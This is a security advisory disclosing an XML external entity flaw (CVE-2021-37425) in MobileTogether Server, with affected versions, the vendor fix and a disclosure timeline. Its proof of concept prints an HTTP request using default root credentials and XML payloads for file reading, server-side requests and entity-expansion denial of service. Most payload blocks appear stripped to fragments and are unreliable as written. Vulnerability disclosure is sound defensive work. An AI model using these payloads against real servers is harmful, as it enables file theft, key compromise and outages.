Advisory: XML External Entity Expansion in MobileTogether Server
RedTeam Pentesting discovered a vulnerability in the MobileTogether
server which allows users with access to at least one app to read
arbitrary, non-binary files from the file system and perform server-side
requests. The vulnerability can also be used to deny availability of the
system. As an example, this advisory shows the compromise of the
server's certificate and private key.
### Details
- Product: MobileTogether Server
- Affected Versions: 7.0-7.3, potentially earlier versions as well
- Fixed Versions: 7.3 SP1
- Vulnerability Type: XML External and Exponential Entity Expansion
- Security Risk: medium
- Vendor URL: `https://www.altova.com/mobiletogether-server`
- Vendor Status: fixed version released
- Advisory URL: `https://www.redteam-pentesting.de/advisories/rt-sa-2021-002`
- Advisory Status: published
- CVE: CVE-2021-37425
- CVE URL: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425`
### Introduction
"MobileTogether Server is the processing powerhouse for your native iOS,
Android, Windows, and browser-based apps.
MobileTogether Server is the back-end hub for your solutions and acts as
a gateway between end-users and your back-end data sources and
infrastructure."
(from the vendor's homepage)
### More Details
MobileTogether Server is a back-end application hosting developed apps
and provide access to various platforms and devices. Access to these
apps is possible via native applications for devices and operating
systems or directly via the browser. To access the MobileTogether
server, depending on configuration either an anonymous login is possible
or credentials are required.
During analysis of the communication between a MobileTogether client
application on a smartphone and the MobileTogether Server, HTTP requests
were observed containing JSON as well as XML data. Generally, the XML
data is used to signal changes in the UI or user-supplied input for the
app hosted in MobileTogether Server.
It was found that user-supplied XML external entities included in the
described HTTP requests are resolved by the MobileTogether Server and
the result is reflected in an HTTP response.
This behaviour allows to read local files, perform server-side requests
and also deny the availability of the service through XML exponential
entity expansion. However, file disclosure is limited to non-binary
files and the absolute path needs to be known in advance.
### Proof of Concept
MobileTogether Server comes with a series of example applications. To
exploit the vulnerability, access to at least one application is
required. In the following, the app EuroFXrates and the default user
root with the default password root is used for demonstration of the
vulnerability.
The following HTTP request contains the minimal data required to be
accepted by the server resulting in the processing of the XML data
stored within the JSON field InfoSetChanges/Changes (formatted for
better readability):
```
POST /workflowmanagement HTTP/1.1
Authorization: Basic cm9vdDpyb290
Content-Type: application/json
Content-Length: 851
Host: 192.168.1.1:8085
Connection: close
{
"DeviceY": 0,
"ClientVersionName": "7.2.2",
"MobileManufacturer": "",
"AllInfosetsSerialized": true,
"ServerName": "192.168.1.1",
"ProtocolVersionMax": "2",
"Language": "en-US",
"DeviceType": "",
"ClientKey": "1_11148009037086584903_2744738433663963458",
"DeviceXDPI": 0,
"DeviceYDPI": 0,
"DeviceYCanvasWithTabs": 0,
"ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
"ProtocolVersionMin": "2",
"DeviceXCanvas": 0,
"ClientArchiveVersionMin": "-74",
"MobileOSVersion": "Android 11",
"DeviceXCanvasWithTabs": 0,
"ClientArchiveVersionMax": "65",
"User": "root",
"DeviceX": 0,
"DesignFileName": "/public/EuroFXrates",
"EncValue": "M9EBc6-7P5cd0",
"DeviceYCanvas": 0,
"MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
"InfosetChanges": [
{
"Changes": [
{
"": "
false
"
}
],
"ID": "$$PERS$$"
}
],
"DeviceIsPortrait": true
}
```
With the following XML data it can be verified that XML entities are
resolved and reflected within predefined XML tags in the HTTP response:
```
]>
&redteam;
```
The HTTP response contains the resolved XML entity:
```
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...]
RedTeam Pentesting
[...]
```
The following example shows how local files can be read from the server
system hosting the MobileTogether Server on a Windows system:
```
]>
&redteam;
```
The content of the file is shown below and formatted for better
readability:
```
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...]
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[...]
```
One interesting target for attackers could be the configuration file for
the MobileTogether Server residing at the following fixed location:
```
C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
```
For example, if the server supports HTTPS, the absolute path to the
server's certificate and private key is stored in its configuration.
Furthermore, external XML entities can be used to access third-party
websites as well as web services that are only available internally.
Together with an externally hosted XML DTD, response information can be
extracted:
```
">
% dtd; ]>
&redteam;
```
The DTD contains the following information:
```
```
In the HTTP response, the HTML markup delivered by internal.example.com
is now visible.
A further vulnerability attacks the availability of the service through
XML exponential entity expansion. This is demonstrated with the
following XML document:
```
]>
&redteam20;
```
Sending the shown XML document leads to a huge server-side resource
allocation which ultimately disrupts the availability of the
MobileTogether Server.
### Workaround
None known.
### Fix
According to the vendor, upgrading to version 7.3 SP1 resolves the
vulnerability.
### Security Risk
Attackers in possession of an account for a MobileTogether Server with
access to at least one app are able to read files from the server
system, conduct HTTP requests to external and internal systems and can
also deny the availability of the service. Access might also be possible
through default credentials or the anonymous user.
### Timeline
- 2021-06-21 Vulnerability identified
- 2021-06-23 Requested a security contact from vendor
- 2021-06-25 Security contact established with vendor
- 2021-07-05 Customer approved disclosure to vendor
- 2021-07-05 Vendor notified
- 2021-07-20 Vendor acknowledged vulnerability
- 2021-07-22 CVE ID requested
- 2021-07-23 CVE ID assigned
- 2021-07-28 Vendor released fixed version
- 2021-08-10 Advisory released
### RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
### Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit: